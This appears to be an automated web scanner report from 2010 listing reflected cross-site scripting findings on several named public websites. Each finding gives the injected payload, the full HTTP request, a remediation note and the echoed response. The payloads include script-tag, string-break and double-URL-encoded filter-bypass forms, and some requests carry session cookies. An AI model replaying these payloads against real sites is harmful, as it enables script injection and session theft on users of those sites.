HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:20 GMT Connection: close Last-Modified: Thu, 16 Dec 2010 13:01:18 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=ISO-8859-1 Content-Length: 12853 Cache-control: no-cache
2.255. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/pr.nsf/PressHome
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3278"-alert(1)-"47e0292b7d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:00 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5021 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77e8"%3be788188be52 was submitted in the REST URL parameter 1. This input was echoed as d77e8";e788188be52 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd77e8"%3be788188be52/pr.nsf/prBydate?readform HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:17 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd77e8";e788188be52/pr.nsf/prBydate?readform"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eef1a"%3bf411ccd2d7e was submitted in the REST URL parameter 3. This input was echoed as eef1a";f411ccd2d7e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/prBydateeef1a"%3bf411ccd2d7e?readform HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:17 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydateeef1a";f411ccd2d7e?readform"); } catch(err) {}</script> ...[SNIP]...
2.258. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/pr.nsf/prBydate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ef1"><script>alert(1)</script>7048834a351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www/pr.nsf/prBydate?readform&85ef1"><script>alert(1)</script>7048834a351=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:16 GMT Connection: close Last-Modified: Thu, 16 Dec 2010 13:01:14 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=ISO-8859-1 Content-Length: 23894 Cache-control: no-cache
2.259. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/pr.nsf/prBydate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32037"-alert(1)-"27f782e283e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:19 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5020 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1"); } catch(err) {}</script> ...[SNIP]...
The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50749"-alert(1)-"135b6c5479a was submitted in the readform parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:15 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a"); } catch(err) {}</script> ...[SNIP]...
2.261. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://info.bisk.com
Path:
/MCIndex.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00fc"-alert(1)-"b0f823cffe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MCIndex.asp?c00fc"-alert(1)-"b0f823cffe6=1 HTTP/1.1 Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 14:57:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 394 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACSQAQAR=BLGOFMPAPAGFDCNPLOKOFCMM; path=/ Cache-control: private
2.262. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff7c"><script>alert(1)</script>f923b4feb1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?eff7c"><script>alert(1)</script>f923b4feb1b=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 16 Dec 2010 14:57:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
2.263. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jsc.madisonlogic.com
Path:
/jsc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a8bdc<script>alert(1)</script>a598a4a7645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsc?a8bdc<script>alert(1)</script>a598a4a7645=1 HTTP/1.1 Host: jsc.madisonlogic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 14:57:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 16 Dec 2010 14:57:44 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 69
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69ade'-alert(1)-'2ede3737740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player69ade'-alert(1)-'2ede3737740/playlist.php HTTP/1.1 Host: media.crainsnewyork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 14:58:11 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9562
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ea96<script>alert(1)</script>92b0d100679 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /player2ea96<script>alert(1)</script>92b0d100679/playlist.php HTTP/1.1 Host: media.crainsnewyork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 14:58:11 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9548
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96d9b<script>alert(1)</script>6e0e344090b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /player/playlist.php96d9b<script>alert(1)</script>6e0e344090b HTTP/1.1 Host: media.crainsnewyork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 14:58:14 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9548
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56746'-alert(1)-'3858b0910ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player/playlist.php56746'-alert(1)-'3858b0910ea HTTP/1.1 Host: media.crainsnewyork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 14:58:13 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9562
The value of REST URL parameter 3 is copied into an HTML comment. The payload d2e34--><script>alert(1)</script>04bd67f681a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a HTTP/1.1 Host: media.pcadvisor.co.uk Proxy-Connection: keep-alive Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:58:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25774517;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/ Set-Cookie: CFTOKEN=db64a13e04e3b841-EFB0762D-24E8-5498-9BD76E8771E98767;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/ Set-Cookie: JSESSIONID=f23052365a96f7339090214d767553170523;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9a474-->956dc082084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /graphics/icons9a474-->956dc082084/slashdot.ico HTTP/1.1 Host: media.pcadvisor.co.uk Proxy-Connection: keep-alive Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:58:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25772930;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/ Set-Cookie: CFTOKEN=c8a6102a81871d2f-EFB00F9E-24E8-5498-9B0C521FA0472181;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/ Set-Cookie: JSESSIONID=3a306c5729decd0825e41d52359705d757d4;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 28fa5--><a>9b1dee05bf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /scripts/pca.js28fa5--><a>9b1dee05bf7 HTTP/1.1 Host: media.pcadvisor.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:58:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25774501;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/ Set-Cookie: CFTOKEN=b7d172a67d94fa17-EFB05C62-24E8-5498-9B711B3B55C40E86;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/ Set-Cookie: JSESSIONID=f2307d3bba30c2a08a95773143236b10356f;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4733d--><script>alert(1)</script>94a5f4d2783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /styles/4733d--><script>alert(1)</script>94a5f4d2783 HTTP/1.1 Host: media.pcadvisor.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:58:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25772972;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/ Set-Cookie: CFTOKEN=9b0dc19f890d8baa-EFB059A0-24E8-5498-9BEEF764F31AA882;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/ Set-Cookie: JSESSIONID=3a30a9aa15a48d1555222e4a56453c2356a2;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload de645-->16d9153269f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /styles/pcamac.cssde645-->16d9153269f HTTP/1.1 Host: media.pcadvisor.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:58:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25774492;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/ Set-Cookie: CFTOKEN=7019de5724484f24-EFB05026-24E8-5498-9B81044F281F0899;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/ Set-Cookie: JSESSIONID=f2303c3e748b659240472d2ff1d35d685e13;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a539%2522%253balert%25281%2529%252f%252f52016fcd1ec was submitted in the REST URL parameter 2. This input was echoed as 2a539";alert(1)//52016fcd1ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/2000002232a539%2522%253balert%25281%2529%252f%252f52016fcd1ec/00056590007964CIO58HH9JQ1JV/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022 was submitted in the REST URL parameter 2. This input was echoed as 154c9"><script>alert(1)</script>349839c022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
